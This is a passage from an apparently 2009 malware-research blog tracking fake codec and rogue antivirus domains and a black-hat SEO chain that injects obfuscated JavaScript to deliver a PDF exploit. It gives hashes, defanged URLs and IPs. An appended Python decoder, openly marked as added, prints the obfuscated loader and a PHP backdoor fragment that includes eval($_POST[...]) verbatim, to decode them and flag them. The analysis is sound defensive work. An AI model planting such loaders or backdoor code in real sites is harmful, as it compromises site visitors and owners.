href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgum0_f401foDyaP56ByemwaDeODOw2o7RngatAZ2rCeoGMTht-BJkXEaV1tBfUzrAUIFFylvewx8wu-WchKyVeOAGTquiNEDsCS78oFOa_52u8wQX-IjALkwBJm9o1FUbnwPAvoIW5J1NM/s1600-h/onlinescanweb.com-RapidAntivirus.jpg"><br /><img style="cursor:pointer; cursor:hand;width: 320px; height: 243px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgum0_f401foDyaP56ByemwaDeODOw2o7RngatAZ2rCeoGMTht-BJkXEaV1tBfUzrAUIFFylvewx8wu-WchKyVeOAGTquiNEDsCS78oFOa_52u8wQX-IjALkwBJm9o1FUbnwPAvoIW5J1NM/s320/onlinescanweb.com-RapidAntivirus.jpg" border="0" alt="onlinewebscan.com RapidAntivirus Template 1 bis"id="BLOGGER_PHOTO_ID_5313599119152255954" /></a><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRDJPdd6-DauW26x5x9yVvg_4pNJYVp3vC6JuZcI_FFZldOAg3FsDgEnen9rH6FYitk4xF7O0iwv6g38cUjUKM3TPUj9piw6-XjBCKcyhb1h_SGwpp-sT8aY5Gg7YuROPObUiEIFnu7bKk/s1600-h/onlinescanweb.comRapidAntivirusTemplate.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 233px;" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRDJPdd6-DauW26x5x9yVvg_4pNJYVp3vC6JuZcI_FFZldOAg3FsDgEnen9rH6FYitk4xF7O0iwv6g38cUjUKM3TPUj9piw6-XjBCKcyhb1h_SGwpp-sT8aY5Gg7YuROPObUiEIFnu7bKk/s320/onlinescanweb.comRapidAntivirusTemplate.jpg" border="0" alt="onlinewebscan.com RapidAntivirus Template 2"id="BLOGGER_PHOTO_ID_5313600207261994738" /></a><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhP_YBqx0PV5903CT0-ZgRNJURWgXdA11f5cII8YvPnZAEK8aYlH-fxsH6kUNm9mMUHamZ3RIwc5LU4IKn9wgYbCyP3WUGcKYK5R-hl_24CeKQlTKx3za6Bv2-9bDUh-PazYXiw8HcAEv4-/s1600-h/onlinescanweb.com-RapidAntivirusTemplate3.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 275px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhP_YBqx0PV5903CT0-ZgRNJURWgXdA11f5cII8YvPnZAEK8aYlH-fxsH6kUNm9mMUHamZ3RIwc5LU4IKn9wgYbCyP3WUGcKYK5R-hl_24CeKQlTKx3za6Bv2-9bDUh-PazYXiw8HcAEv4-/s320/onlinescanweb.com-RapidAntivirusTemplate3.jpg" border="0" alt="onlinewebscan.com RapidAntivirus Template 3"id="BLOGGER_PHOTO_ID_5313601213075256674" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOXk4FNeDs26DjNr7wZRjiFJ7V1cFkBDQ7t-ACfEUJAuqSj-qUuqBsCb5oRluq9_IN6Ikb3hmm3F-HsXZXe_pLHheoEKA7hkBH-FWc_ztWN9KNBCWJ09qZWX6RgpIQPIv8gTuWh7eFizWJ/s1600-h/onlinescanweb.com-RapidAntivirusTemplate3bis.jpg"><br /><img style="cursor:pointer; cursor:hand;width: 320px; height: 260px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOXk4FNeDs26DjNr7wZRjiFJ7V1cFkBDQ7t-ACfEUJAuqSj-qUuqBsCb5oRluq9_IN6Ikb3hmm3F-HsXZXe_pLHheoEKA7hkBH-FWc_ztWN9KNBCWJ09qZWX6RgpIQPIv8gTuWh7eFizWJ/s320/onlinescanweb.com-RapidAntivirusTemplate3bis.jpg" border="0" alt="onlinewebscan.com RapidAntivirus Template 3 bis"id="BLOGGER_PHOTO_ID_5313601220254183170" /></a><br /><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOM6z3QwsPCZLnJCQSYvh-txpPARzZt1cj37JSvlFPUo4g2dI9vFTLJ90sIy0DnF_fVH-jUH8jYCCQeQ-CD8TsziIYEO87T8A8gHLg0pqjoXTOJU_K-gdMqJvAnWjsWh1hM6WWTRHpTVF-/s1600-h/onlinescanweb.com-AntivirusPlus_Template2.jpg"><img style="cursor:pointer; cursor:hand;width: 314px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOM6z3QwsPCZLnJCQSYvh-txpPARzZt1cj37JSvlFPUo4g2dI9vFTLJ90sIy0DnF_fVH-jUH8jYCCQeQ-CD8TsziIYEO87T8A8gHLg0pqjoXTOJU_K-gdMqJvAnWjsWh1hM6WWTRHpTVF-/s320/onlinescanweb.com-AntivirusPlus_Template2.jpg" border="0" alt="onlinewebscan.com AntivirusPlus Template"id="BLOGGER_PHOTO_ID_5313602213458773058" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYX677PaFLDjfldeF0eM8_z5TTCLTDZze9hueYXMmOoeHvj0anX5vBIBE6z230YSIaDj3B3AEmdJtxkHfrLyBnkDE5GPNZWI5PC4k_ndHmXvjrbO80rWjKiWHM4JGEREGqCbAXlOME2isM/s1600-h/onlinescanweb.com-AntivirusPlus_Template2bis.jpg"><br /><img style="cursor:pointer; cursor:hand;width: 320px; height: 255px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYX677PaFLDjfldeF0eM8_z5TTCLTDZze9hueYXMmOoeHvj0anX5vBIBE6z230YSIaDj3B3AEmdJtxkHfrLyBnkDE5GPNZWI5PC4k_ndHmXvjrbO80rWjKiWHM4JGEREGqCbAXlOME2isM/s320/onlinescanweb.com-AntivirusPlus_Template2bis.jpg" border="0" alt="onlinewebscan.com AntivirusPlus Template 2"id="BLOGGER_PHOTO_ID_5313602211653738594" /></a><br /><br /></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." 
: "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-72513060435326274242009-04-04T22:57:00.000-07:002009-04-04T23:03:29.801-07:00tubeloyaln.com Fake Codec and RogueAV Revisited<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="1224" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td colspan="2" valign="top" height="758"><p><span style="font-size:14px; font-weight:bold">tubeloyaln.com Fake Codec and Rogue Antivirus revisited</span><br /><br /><br /> The previous page, which lists 14 domains (10 of them active), is <a href="http://malware-web-threats.blogspot.com/2009/03/loyaldown-loyaltube-fake-codec-and.html" target="_blank">here</a><br />
</p><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"> <tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus">THIS page</a> if you need more information<br /></td> </tr></table><p><u>Fake codec and fake scanner page</u>:<br /><br />hxxp://tubeloyaln.com/scan/?id=..<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDhFWLv4-bJ9-bbXayuhtOt33oLFbJWxHJIfNYwlcAT5wUFamZb2D81famcIbF93RMuMt_PIjCfYeQcFDnrKLFCMEAHRHQAqRg4Lc6XSbdgs7tIcmFkdDwGdkxq3dh0BmQDzw2ojvfCjD3/s1600-h/loyaltube09.com-FakeScanner.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 271px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDhFWLv4-bJ9-bbXayuhtOt33oLFbJWxHJIfNYwlcAT5wUFamZb2D81famcIbF93RMuMt_PIjCfYeQcFDnrKLFCMEAHRHQAqRg4Lc6XSbdgs7tIcmFkdDwGdkxq3dh0BmQDzw2ojvfCjD3/s320/loyaltube09.com-FakeScanner.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318398138422907154" /></a> <br /><br />hxxp://tubeloyaln.com/tube/?id=197&title=adult+movie<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijk1EMuFqJreL_cghnWZa_NkHPIokvwcmNoPRRA0gxrKjvKUQ6phJfqLeSHkEA6nVU9PekFMtmKBBIs2wp4rSklG2UzW09zLsDPsJiuoW2h13xQRmI3JvOSGlSiJSQaywq0Avg6bFgu6pY/s1600-h/tubeloyaln.com-fake-codec.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 290px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijk1EMuFqJreL_cghnWZa_NkHPIokvwcmNoPRRA0gxrKjvKUQ6phJfqLeSHkEA6nVU9PekFMtmKBBIs2wp4rSklG2UzW09zLsDPsJiuoW2h13xQRmI3JvOSGlSiJSQaywq0Avg6bFgu6pY/s320/tubeloyaln.com-fake-codec.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321062064246878866" /></a> <br /><br /><span class="scam_website">win-pc-defender.com</span><br /><br /><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBZaFdV5m52XBn8olxg1iW-tfAkga6DRzx0FyBTkRlmYQXPbxsZf07noTYwy39QoFW9cKMRkEdfkeXPFPYRYL1iJLUFDJpGjmu-JxjzTQe9hGnO0naXnEkJGSFjFON6hNS-gl7yMShSRqd/s1600-h/win-pc-defender.com.jpg"><img style="cursor:pointer; cursor:hand;width: 273px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBZaFdV5m52XBn8olxg1iW-tfAkga6DRzx0FyBTkRlmYQXPbxsZf07noTYwy39QoFW9cKMRkEdfkeXPFPYRYL1iJLUFDJpGjmu-JxjzTQe9hGnO0naXnEkJGSFjFON6hNS-gl7yMShSRqd/s320/win-pc-defender.com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321067351277614082" /></a> <br /><br />hxxp://winpcdown09.com/file.exe<br /><br /><a href="http://www.virustotal.com/analisis/27da52a50d8e8cf3213ef96a970cd4bd" target="_blank"> VirusTotal</a>: 14/40<br /><a href="http://anubis.iseclab.org/?action=result&task_id=1412edcea7cac58b4593ac1e8c2fd0757" target="_blank">Anubis</a><br /><br />File size: 71680 bytes<br />MD5...: ac10a8c9d0e7508beafa6f61c1af44bc<br /><br />Alias: <span style="color:#FF0000">Win32/Insebro.A</span> - <span style="color:#FF0000">Adware.WinPCDefender</span><br /><br />hxxp://winpcdown09.com/file.exe<br /><br /><a href="http://www.virustotal.com/analisis/cec611a2cd7a184f6dba817eb89d8e01" target="_blank">VirusTotal</a>: 10/39<br /><a href="http://anubis.iseclab.org/?action=result&task_id=1412edcea7cac58b4593ac1e8c2fd0757" target="_blank">Anubis</a><br /><a href="http://info.prevx.com/aboutprogramtext.asp?PX5=6C641AEF0030F4099A9C0F52D23B6300ECE58BEC" target="_blank">Prevx</a><br /><br />File size: 1022464 bytes<br />MD5...: 34e1cd77554c06f9d24a6857f702b4fd<br /><br />Alias: <span style="color:#FF0000">FakeAlert.IM</span> -<span style="color:#FF0000"> Win32/FakeRean</span> - <span style="color:#FF0000">WinPCDefender</span><br /><br /><a href="http://www.threatexpert.com/report.aspx?md5=e66fb67721bcb6a6b47879e451ce905b" target="_blank">ThreatExpert</a> (other file)<br />Fraudulent payment system: 
hxxp://billingpayment.net/pp/?id= <br /><br /><span class="scam_website">winpcdown09.com<br />winpcdown99.com</span><br /><br /><a href="http://www.virustotal.com/analisis/c599f082cd2330a526afb9aaf2e0d15f" target="_blank">VirusTotal</a>: 21/40<br /><a href="http://info.prevx.com/aboutprogramtext.asp?PX5=C5F95F4000E8ED498008012DDDE82A008FF2688D" target="_blank">Prevx</a><br /><a href="http://anubis.iseclab.org/?action=result&task_id=17eb2259b3146e8747922d55cd0d51d8a" target="_blank">Anubis </a><br /><br />File size: 98304 bytes<br />MD5...: d15e5bb28d5e4c31651efb32e000397f<br /><br />Alias: <span style="color:#FF0000">Trojan:Win32/Alureon</span> - <span style="color:#FF0000">Win32.Tdss</span> - <span style="color:#FF0000">DNSChanger.r</span><br /><br />Associated websites: <br /><br />trafficstatic.com [92.48.91.144]<br />statsanalist.cn [72.233.114.126]<br />livefind1blogging.com [72.233.115.169]<br /><br /></p><p>The updated list is as follows (including sub-domains):<br /><br /><span class="scam_website">iloveyourbrain.com<br />loyal-tube.com<br />loyaldown99.com<br />loyaltube.com<br />loyaltube09.com<br />loyaltube10.com<br />rakompoporyadkunazaryadku.com<br />ruler-domains.com<br />setupdatdownload.com<br />tube-loyal.com<br />tubeloyal.com<br />tubeloyaln.com<br />billingpayment.net<br />codecs.tubeloyaln.com <br />lamer.tubeloyaln.com <br />videosz.tubeloyaln.com<br />wedare.tubeloyaln.com<br />velzevuladmin.com <br />win-pc-defender.com<br />winpcdown09.com<br />winpcdown99.com<br />xp-police-09.com<br />xp-police-2009.com<br />xp-police-antivirus.com<br />xp-police-av.com<br />xp-police-engine.com<br />xp-police.com<br />gofuckbiz.xp-police.com <br />lamer.xp-police.com <br />suckmydick.xp-police.com<br />rulerteam.xp-police.com<br />sigurd.xp-police.com</span><br /><br />DNS:<br /><br /><span class="scam_website">ns1.loyaltube10.com<br />ns1.tube-loyal.com<br />ns1.tubeloyal.com<br />ns1.winpcdown09.com<br />ns1.winpcdown99.com<br />ns1.xp-police.com<br 
/>ns2.loyaltube10.com<br />ns2.tube-loyal.com<br />ns2.tubeloyal.com<br />ns2.winpcdown09.com<br />ns2.winpcdown99.com<br />ns2.xp-police.com<br />ns3.xp-police.com<br />ns4.xp-police.com<br />ns5.xp-police.com</span><br /><br />IP: 213.163.65.10<br />Reverse: mail.l1ght.net<br />Route: 213.163.64.0/19<br />AS:AS20495 - WEDARE We Dare BV Autonomous System<br /><br /><br /></p></td></tr> <tr> <td height="25" colspan="2" valign="top" style="background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Mys96Pf0dtW1L7tKUiFWVVVD1ZmHLx3eZ8LXnpIEUioqMsXimIo-2wzIHbVQoKA5oDFpi1Ho5X-yiMzg8ESOj6iSKcCIdGbzEFyXa2U2q2aPFfq25hseA5fHGQH7RleVNGiNAtOWDFkt/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Analysis:</b></td> </tr> <tr> <td width="25" height="208" valign="top"><br /></td> <td width="547"><br /><table width="524" border="0" cellspacing="0" cellpadding="0"><tr><td> </td><td><b>Site URLs</b>:</td><td colspan="2">hxxp://tubeloyaln.com/scan/?id=..</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2">hxxp://tubeloyaln.com/tube/?id=197&title=adult+movie</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2">hxxp://tubeloyaln.com/codec/.exe</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td> </td><td colspan="2">hxxp://wincodecupdate.com/codec/.exe</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td width="20"> </td><td width="144"><b>File info</b>:</td><td colspan="2">codec.exe</td><td width="18"> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>File size</td><td colspan="2">107010 bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td colspan="2">e66fb67721bcb6a6b47879e451ce905b</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td></td><td 
colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>ThreatExpert</b>:</td><td colspan="2"><a href="http://www.threatexpert.com/report.aspx?md5=e66fb67721bcb6a6b47879e451ce905b" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td colspan="2"><a href="http://www.virustotal.com/analisis/639b3f0ab92bf9fcbea9c6dd6d9eb43a" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>Anubis</b>:</td><td colspan="2"><a href="http://anubis.iseclab.org/?action=result&task_id=1dae68d4e19b12db48995ce91fe940de0" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>First received</td><td colspan="2"><span id="status_fecha2">04.05.2009 06:39:41 (CET)</span><br /></td><td> </td></tr><tr><td> </td><td>Results</td><td colspan="2">6/40 (15%)</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>Alias:</td><td><span style="color:#FF0000">FakeAlert.IR</span></td><td>AVG</td><td> </td></tr><tr><td> </td><td> </td><td width="185"><span style="color:#FF0000">(Suspicious) - DNAScan</span></td><td width="157">CAT-QuickHeal</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Suspicious File</span></td><td> eSafe</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Downloader-BON</span></td><td>McAfee</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Downloader-BON</span></td><td>McAfee+Artemis</td><td> </td></tr><tr><td> </td><td> </td><td width="185"><span style="color:#FF0000">TrojanDropper:Win32/Insebro.A</span></td><td>Microsoft</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Malware-Cryptor.Win32.Zorq</span></td><td>VBA32</td><td> </td></tr></table><br /></td> </tr><tr><td height="25" colspan="2" valign="top" 
style="background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Mys96Pf0dtW1L7tKUiFWVVVD1ZmHLx3eZ8LXnpIEUioqMsXimIo-2wzIHbVQoKA5oDFpi1Ho5X-yiMzg8ESOj6iSKcCIdGbzEFyXa2U2q2aPFfq25hseA5fHGQH7RleVNGiNAtOWDFkt/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Network graph</b></td></tr><tr><td height="208" valign="top"><br /></td><td><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkDxH7rZE432dsXjFtZgvp5i9jpIoYhBba4SSCsvAsA5MQovLJStP1pvRfOrrnMAqD59jiDadgT8N7OGbC0TCPyRT7rVaDciV0fvZLuA8Saw-ZQ9PxCi4PEC_QEpPU_NRneupCTefmvbry/s1600-h/tubeloyaln.com-fake-codec-213.163.65.10.jpg"><img style="cursor:pointer; cursor:hand;width: 82px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkDxH7rZE432dsXjFtZgvp5i9jpIoYhBba4SSCsvAsA5MQovLJStP1pvRfOrrnMAqD59jiDadgT8N7OGbC0TCPyRT7rVaDciV0fvZLuA8Saw-ZQ9PxCi4PEC_QEpPU_NRneupCTefmvbry/s320/tubeloyaln.com-fake-codec-213.163.65.10.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321077363584002754" /></a><br /></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." 
: "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-64446202410462962272009-04-03T11:28:00.000-07:002009-04-19T17:00:56.872-07:00Black Hat SEO and Rogue Antivirus p.5<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="572" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO planting trojans</span> <br /><br /> Full of hacks<br /></p><table width="549" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="549"><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333">THIS page</a> if you need more information<br /></td></tr></table><br /><br />Follow this page for disinfection instructions: <a href="http://blog.scansafe.com/journal/2009/4/14/malware-manipulating-google-serps.html" target="_blank">Malware Manipulating Google SERPs</a> (from blog.scansafe.com)<p> After the spyware and rogue security software pushed in the previous pages, here is another set of compromised websites, all with obfuscated JavaScript inserted that loads:<br /> <br /> hxxp://94.247.2.195/news/?id=100<br /> (<a href="http://jsunpack.jeek.org/dec/go?url=94.247.2.195_news__id=100" target="_blank">Analysis</a>) <br /> <br /> which in turn calls <br /> <br /> hxxp://94.247.2.195/news/?id=2<br /> <br /> and downloads a PDF with a random name such as QRB.pdf, WXk.pdf 
...<br /> <br /> File size: 10417 bytes<br /> MD5: af28f3bc9424a3da7ff8bc84740bce93 <br /> <br /> <a href="http://www.virustotal.com/analisis/6a54baeba7d05c80bc4316ad3b294f86" target="_blank">VirusTotal Analysis</a>: 0/40 (0%)<br /> <br /> when running it load <br /> <br /> hxxp://94.247.2.195/news/?id=10&<br /> <br /> With an Adobe Collab overflow (<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659" target="_blank">CVE-2007-5659</a>) <br /> <a href="http://wepawet.iseclab.org/view.php?hash=af28f3bc9424a3da7ff8bc84740bce93&type=js" target="_blank">Wepawet Analysis</a><br /> <br /> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg63T_-ZTv43ItAVvsrgrJW07UqtGxyFcOSVG-qU4nh-XHW80Br0dZi7quVAhCq_aFxAylW3Q7lXmwJk-g9vgt34eJlQT65IsL2O-crCdBkB-vh_vC3apzLslUvqkrYRnWE5F98VnAjV7Kb/s1600-h/PDF1.jpg"><img style="cursor:pointer; cursor:hand;width: 223px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg63T_-ZTv43ItAVvsrgrJW07UqtGxyFcOSVG-qU4nh-XHW80Br0dZi7quVAhCq_aFxAylW3Q7lXmwJk-g9vgt34eJlQT65IsL2O-crCdBkB-vh_vC3apzLslUvqkrYRnWE5F98VnAjV7Kb/s320/PDF1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320534507554408930" /></a><br /> <br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPR7aRJzhxPXlAXQ1B4RehxMdOCBUW7TJ-j201dNtGI59x4ajhgu4T3UbXswoBql34KUWrCNXq4Zo91WpcAIkZqii8_E1A1y4fmtPi7c_MxrHE2N28s4A5QHGRftnRuedkl1I8zYG_0rcl/s1600-h/PDF2.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 245px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPR7aRJzhxPXlAXQ1B4RehxMdOCBUW7TJ-j201dNtGI59x4ajhgu4T3UbXswoBql34KUWrCNXq4Zo91WpcAIkZqii8_E1A1y4fmtPi7c_MxrHE2N28s4A5QHGRftnRuedkl1I8zYG_0rcl/s320/PDF2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320534511430819394" /></a><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg63T_-ZTv43ItAVvsrgrJW07UqtGxyFcOSVG-qU4nh-XHW80Br0dZi7quVAhCq_aFxAylW3Q7lXmwJk-g9vgt34eJlQT65IsL2O-crCdBkB-vh_vC3apzLslUvqkrYRnWE5F98VnAjV7Kb/s1600-h/PDF1.jpg"></a><br /> <br />which leads to an executable being downloaded and executed.<br />
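<br />The first stage of this whole chain is the obfuscated loader injected into the compromised pages: the unescape().replace() script and the base64 constant inside the PHP backdoor, both listed further down in this post. The Python helper below is an added example for this page, not code from the post or from the malware. It replays the loader's own decoding steps (JavaScript unescape(), then deletion of every junk token named in the regex alternation), looks inside base64_decode('...') literals so the copy hidden in the PHP is decoded as well, and flags the backdoor's tell-tale signs in a PHP file. The two encoded strings are copied verbatim from this post; the PHP excerpt is a constructed three-line fragment of the listing (the eval() line, the define() line and the ob_start() line, rejoined onto single lines), and the indicator names are this example's own.<br />

```python
import base64
import re
from urllib.parse import unquote

# Obfuscated <script> copied from this post (blog line breaks inside the literal removed).
JS_LOADER = (
    "<script language=javascript>document.write(unescape('"
    "%3CGXscrLrGXirLpt%20VhsrcrL%3DSn%2FHY8%2F78HY8%2EGX1GX1Cl60%2ECl6"
    "1Cl67Cl65Cl6%2E24Vh9zAn%2FCl6jquVheHY8rrLyCl6%2EjSns%3EGX%3C%2FGXsz"
    "AnczAnrHY8iprLtzAn%3E"
    "').replace(/Cl6|HY8|zAn|Sn|rL|Vh|GX/g,\"\"));</script>"
)
# Constructed three-line excerpt of the injected PHP (base64 string copied verbatim).
PHP_EXCERPT = (
    "if (isset($_POST['tmp_lkojfghx3'])) eval($_POST['tmp_lkojfghx3']);\n"
    "if (!defined('TMP_XHGFJOKL')) define('TMP_XHGFJOKL', base64_decode('"
    "PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNj"
    "YXBlKCdyYzYlM0Nla2JzMndjcmlJaXAyd3QlMjBzMFMwcmMlM0QlMkYlMkY3SFh6OCUyRTBT"
    "MDEydzEwSFh6JTJFcmM2MXJON0hYejVEdSUyRXJOMjRla2I5JTJGMndqcmM2cUlpdWVyZWti"
    "eWVrYiUyRXJjNmpyYzZzJTNFMFMwJTNDMnclMkZzYzBTMHJIWHppcGVrYnQlM0UnKS5yZXBs"
    "YWNlKC9yYzZ8MFMwfElpfER1fGVrYnxyTnwyd3xIWHovZywiIikpOwogLS0+PC9zY3JpcHQ+"
    "'));\n"
    "ob_start('tmp_lkojfghx');\n"
)

# document.write(unescape('<encoded>').replace(/tok1|tok2|.../g, ""))
LOADER_RE = re.compile(
    r"unescape\(\s*(['\"])(?P<enc>[^'\"]*)\1\s*\)"
    r"\s*\.replace\(\s*/(?P<junk>[^/]+)/g\s*,\s*(['\"])\4\s*\)"
)
# base64_decode('...') literals in PHP; the backdoor hides its loader this way.
B64_CALL_RE = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def js_unescape(s):
    """JavaScript unescape(): %uXXXX first, then %XX (byte-wise, hence latin-1)."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")


def decode_loader(encoded, junk_alternation):
    """Replay the loader's own pipeline: unescape(), then delete every junk token.
    String.replace(/a|b/g, "") and re.sub both take the leftmost alternative, so
    the alternation from the script can be reused verbatim."""
    return re.sub(junk_alternation, "", js_unescape(encoded))


def find_loaders(source, depth=0):
    """Decoded tag for every unescape().replace() loader in `source`, including
    those hidden inside base64_decode('...') literals (a few levels deep)."""
    tags = [decode_loader(m.group("enc"), m.group("junk")) for m in LOADER_RE.finditer(source)]
    if depth < 3:
        for m in B64_CALL_RE.finditer(source):
            try:
                inner = base64.b64decode(m.group(1), validate=True).decode("latin-1")
            except ValueError:  # not valid base64, skip it
                continue
            tags += find_loaders(inner, depth + 1)
    return tags


def script_src(tag):
    """src= of a decoded <script> tag; the loader writes it without quotes."""
    m = re.search(r"<script[^>]*\ssrc\s*=\s*['\"]?([^'\"\s>]+)", tag, re.I)
    return m.group(1) if m else None


# Tell-tale signs of the injected PHP in this post; the names are this example's own.
INDICATORS = [
    ("eval_of_POST", re.compile(r"eval\s*\(\s*\$_POST\[")),
    ("tmp_lkojfghx_marker", re.compile(r"tmp_lkojfghx")),
    ("ob_start_filter", re.compile(r"ob_start\s*\(\s*['\"]tmp_")),
]


def backdoor_indicators(php_source):
    """Names of the indicators that fire on `php_source`, plus 'hidden_loader'
    when a loader script is found inside a base64 literal."""
    hits = [name for name, rx in INDICATORS if rx.search(php_source)]
    if find_loaders(php_source):
        hits.append("hidden_loader")
    return hits


if __name__ == "__main__":
    for tag in find_loaders(JS_LOADER) + find_loaders(PHP_EXCERPT):
        print(tag, "->", script_src(tag))
    print("indicators:", backdoor_indicators(PHP_EXCERPT))
```

Both samples decode to the same thing: a script tag whose src is //78.110.175.249/jquery.js, the very URL listed below, so the PHP constant is nothing but the base64 of the JavaScript loader, and the ob_start() callback is what plants it before the body tag of every page the server emits. Run against a site's PHP files, backdoor_indicators() is a quick triage; find_loaders() works on any unescape().replace(/a|b|c/g,"") loader because the alternation is taken verbatim. Back to the executable dropped at the end of the chain:<br />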
